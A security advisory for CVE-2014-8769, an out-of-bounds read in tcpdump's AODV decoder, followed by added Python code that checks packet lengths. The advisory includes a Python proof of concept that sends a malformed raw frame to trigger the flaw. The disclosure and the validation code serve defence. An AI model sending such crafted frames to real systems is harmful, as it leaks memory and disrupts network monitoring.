
tcpdump 4.6.2 AODV Unreliable Output

Posted on 19 November 2014

CVE-2014-8769: tcpdump unreliable output using malformed AODV payload

1. Background

tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

2. Summary Information

It was found that malformed network traffic (AODV-based) can lead to abnormal behaviour when tcpdump monitors the network with verbose output enabled.

3. Technical Description

The application's decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bounds accesses. The application will usually not crash, but it performs out-of-bounds accesses and outputs/leaks larger amounts of invalid data, which might lead to dropped packets. It is unknown whether other payloads exist that might trigger segfaults.

To reproduce, start tcpdump on a network interface:

sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide a possible segfault message on certain environments; see dmesg for details) and use the following Python program to generate a frame on the network (might also need sudo):

#!/usr/bin/env python3
from socket import socket, AF_PACKET, SOCK_RAW

# Raw Ethernet frame: Ethernet header, IPv4 header, UDP header (source port 654, AODV)
# and the malformed AODV payload. Python 3 needs a bytes literal here.
aovd_frame = (
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f"
    b"\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00"
    b"\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00"
    b"\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
)
s = socket(AF_PACKET, SOCK_RAW)  # raw sockets require CAP_NET_RAW (root)
s.bind(("lo", 0))
s.send(aovd_frame)

4. Affected versions

Affected versions are 3.8 through 4.6.2.

5. Fix

The problem is fixed in the upcoming version tcpdump 4.7.0.

6. Advisory Timeline

2014-11-08 Discovered
2014-11-09 Requested CVE
2014-11-11 Reported to vendor by email
2014-11-12 Vendor made a fix available as repository patch
2014-11-13 CVE number received
2014-11-13 Published CVE advisory

7. Credit

The issue was found by Steffen Bauch (Twitter: @steffenbauch, http://steffenbauch.de) using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.
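The length validation the advisory says the AODV decoder lacks, as an added example in Python (not code from the advisory or from tcpdump): a parser that walks Ethernet, IPv4, UDP and the AODV message header and refuses to read past the bytes actually captured. The build_rreq_frame helper, its 10.0.0.x addresses and the RFC 3561 minimum message sizes are assumptions of this example; the frame from the script above is rejected at the IP total-length check, since its header declares 0xe63d (58941) bytes while the frame carries far fewer.

```python
import struct

ETH_HLEN, IP_MIN_HLEN, UDP_HLEN, AODV_PORT = 14, 20, 8, 654
# Minimum body sizes per message type from RFC 3561: RREQ 24, RREP 20, RERR 4 (+8 per entry), RREP-ACK 2
AODV_MIN_LEN = {1: 24, 2: 20, 3: 4, 4: 2}

class TruncatedPacket(ValueError):
    """Raised when a declared length exceeds the bytes actually captured."""

def need(buf: bytes, offset: int, n: int, what: str) -> None:
    # The check a decoder must make before touching buf[offset:offset+n]
    if offset + n > len(buf):
        raise TruncatedPacket(f"{what}: need {n} bytes at {offset}, only {len(buf) - offset} captured")

def parse_aodv_frame(frame: bytes) -> dict:
    """Walk Ethernet -> IPv4 -> UDP -> AODV, validating every length against the capture."""
    need(frame, 0, ETH_HLEN, "ethernet header")
    if struct.unpack_from("!H", frame, 12)[0] != 0x0800:
        raise ValueError("not IPv4")
    ip = ETH_HLEN
    need(frame, ip, IP_MIN_HLEN, "ip header")
    ihl, ip_total = (frame[ip] & 0x0F) * 4, struct.unpack_from("!H", frame, ip + 2)[0]
    if ihl < IP_MIN_HLEN or ip_total < ihl + UDP_HLEN:
        raise ValueError("bad ip length fields")
    need(frame, ip, ip_total, "ip total length")  # declared length must fit the capture
    if frame[ip + 9] != 17:
        raise ValueError("not UDP")
    udp = ip + ihl
    sport, dport, udp_len = struct.unpack_from("!HHH", frame, udp)
    if AODV_PORT not in (sport, dport):
        raise ValueError("not AODV")
    if udp_len < UDP_HLEN + 1 or udp + udp_len > ip + ip_total:
        raise ValueError("bad udp length")
    payload = frame[udp + UDP_HLEN:udp + udp_len]
    mtype = payload[0]
    if mtype not in AODV_MIN_LEN:
        raise ValueError(f"unknown AODV type {mtype}")
    need(payload, 0, AODV_MIN_LEN[mtype], f"AODV type {mtype} body")  # body must be present before decoding fields
    return {"type": mtype, "sport": sport, "dport": dport, "payload_len": len(payload)}

def build_rreq_frame(body_len: int = 24) -> bytes:
    """Constructed AODV RREQ frame (hypothetical 10.0.0.x hosts); body_len < 24 gives a consistent but short message."""
    rreq = bytes([1]) + bytes(body_len - 1)  # type 1 followed by zeroed fields
    udp = struct.pack("!HHHH", AODV_PORT, AODV_PORT, UDP_HLEN + len(rreq), 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_MIN_HLEN + len(udp) + len(rreq),
                     0, 0, 64, 17, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return bytes(12) + b"\x08\x00" + ip + udp + rreq
```

Every read is preceded by a check against the captured length rather than the length a header claims, which is the difference between reporting a truncated packet and leaking whatever lies past the buffer.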
